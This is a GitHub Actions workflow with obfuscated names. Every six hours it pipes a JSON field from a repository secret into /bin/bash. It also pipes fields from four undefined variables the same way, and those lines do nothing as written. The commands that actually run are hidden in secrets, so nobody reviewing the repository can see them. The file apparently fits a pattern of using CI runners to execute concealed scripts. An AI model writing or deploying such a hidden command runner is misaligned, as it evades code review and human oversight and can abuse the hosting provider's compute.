name: qiutongyu2314

on:
  workflow_dispatch:
  schedule:
    - cron: '39 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qiutongyu2314
        env:
          plni2: ${{ secrets.plni2 }}
        run: |
          echo $plni2 | jq -r .ikszq857 | /bin/bash
          echo $vcdkv513 | jq -r .e50 | /bin/bash
          echo $mmy662 | jq -r .oeq790 | /bin/bash
          echo $s25 | jq -r .gu4187 | /bin/bash
          echo $dald8478 | jq -r .gq2 | /bin/bash

